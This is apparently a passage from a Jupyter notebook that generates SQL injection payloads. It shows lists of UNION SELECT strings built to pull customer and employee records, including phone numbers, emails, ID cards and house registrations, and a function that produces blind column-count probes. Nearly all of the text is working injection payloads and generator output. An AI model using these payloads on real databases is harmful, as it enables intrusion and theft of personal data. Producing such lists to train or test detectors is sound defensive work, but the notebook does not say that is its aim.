 '\\"; UNION SELECT tel, customer_id FROM customer#',
 '\\"; UNION SELECT house_registration, graduation_certificate FROM employee-- ',
 '\\"; UNION SELECT house_registration, work_background, email FROM employee# ',
 '\\"; UNION SELECT tel FROM customer-- ',
 '\\"; UNION SELECT email, tel, customer_id, fname FROM customer-- ',
 '\\"; UNION SELECT customer_id, email, lname, fname FROM customer#',
 '\\"; UNION SELECT email, lname FROM customer-- ',
 '\\"; UNION SELECT email, tel FROM employee-- ',
 '\\"; UNION SELECT fname FROM customer#',
 '\\"; UNION SELECT graduation_certificate, house_registration, id_card, tel, email, employee_id, work_background, address, prefixname FROM employee-- ']

In [18]:
def randomUnionForBlind(table, table_value, last):
    gen=[]
    for i in range(200) :
        preStr =""
        random_table=table[random.randint(0, len(table)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        preStr += r'\";'+" UNION SELECT "
        
        numOfParam=random.randint(1, len(table_value[random_table])-1)
        for j in range(numOfParam) :   
            preStr += "1"
            if j != numOfParam-1 :
                preStr += ", "
        preStr += " FROM " + random_table
        preStr += "" + random_last

        if preStr in gen:
            continue
        else:
            gen.append(preStr)
    return gen

In [19]:
randomUnionForBlind(table, table_value, last)

['\\"; UNION SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM employee#',
 '\\"; UNION SELECT 1, 1 FROM customer# ',
 '\\"; UNION SELECT 1, 1, 1, 1 FROM customer# ',
 '\\"; UNION SELECT 1, 1, 1, 1 FROM employee# ',
 '\\"; UNION SELECT 1 FROM users-- ',
 '\\"; UNION SELECT 1 FROM customer# ',
 '\\"; UNION SELECT 1 FROM service# ',
 '\\"; UNION SELECT 1 FROM users#',
 '\\"; UNION SELECT 1 FROM customer-- ',
 '\\"; UNION SELECT 1, 1, 1, 1 FROM customer#',
 '\\"; UNION SELECT 1 FROM service#',
 '\\"; UNION SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM employee-- ',
 '\\"; UNION SELECT 1 FROM users# ',
 '\\"; UNION SELECT 1, 1, 1 FROM customer# ',
 '\\"; UNION SELECT 1 FROM service-- ',
 '\\"; UNION SELECT 1, 1, 1 FROM customer-- ',
 '\\"; UNION SELECT 1, 1, 1, 1, 1, 1 FROM employee#',
 '\\"; UNION SELECT 1, 1, 1, 1, 1, 1 FROM employee-- ',
 '\\"; UNION SELECT 1, 1 FROM customer#',
 '\\"; UNION SELECT 1, 1, 1, 1, 1, 1, 1 FROM employee# ',
 '\\"; UNION SELECT 1, 1, 1, 1 FROM customer-- ',
 '\\"; UNION SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM employee#',
 '\\"; UNION SELECT 1, 1 FROM employee# ',
 '\\"; UNION SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM employee# ',
 '\\"; UNION SELECT 1, 1, 1, 1 FROM employee#',
 '\\"; UNION SELECT 1, 1, 1 FROM customer#',
 '\\"; UNION SELECT 1, 1, 1, 1, 1, 1, 1 FROM employee#',
 '\\"; UNION SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM employee# ',
 '\\"; UNION SELECT 1, 1, 1, 1 FROM employee-- ',
 '\\"; UNION SELECT 1, 1, 1, 1, 1 FROM employee# ',
 '\\"; UNION SELECT 1, 1, 1 FROM employee# ',
 '\\"; UNION SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM employee-- ',
 '\\"; UNION SELECT 1, 1, 1, 1, 1, 1, 1, 1 FROM employee-- ',
 '\\"; UNION SELECT 1, 1, 1, 1, 1, 1, 1 FROM employee-- ',
 '\\"; UNION SELECT 1, 1 FROM customer-- ',
 '\\"; UNION SELECT 1 FROM employee# ',
 '\\"; UNION SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM employee-- ',
 '\\"; UNION SELECT 1, 1, 1, 1, 1, 1, 1, 1 FROM employee# ',
 '\\"; UNION SELECT 1, 1, 1, 1, 1 FROM employee-- ',
 '\\"; UNION SELECT 1, 1, 1 FROM employee-- ',
 '\\"; UNION SELECT 1 FROM customer#',
 '\\"; UNION SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM employee#']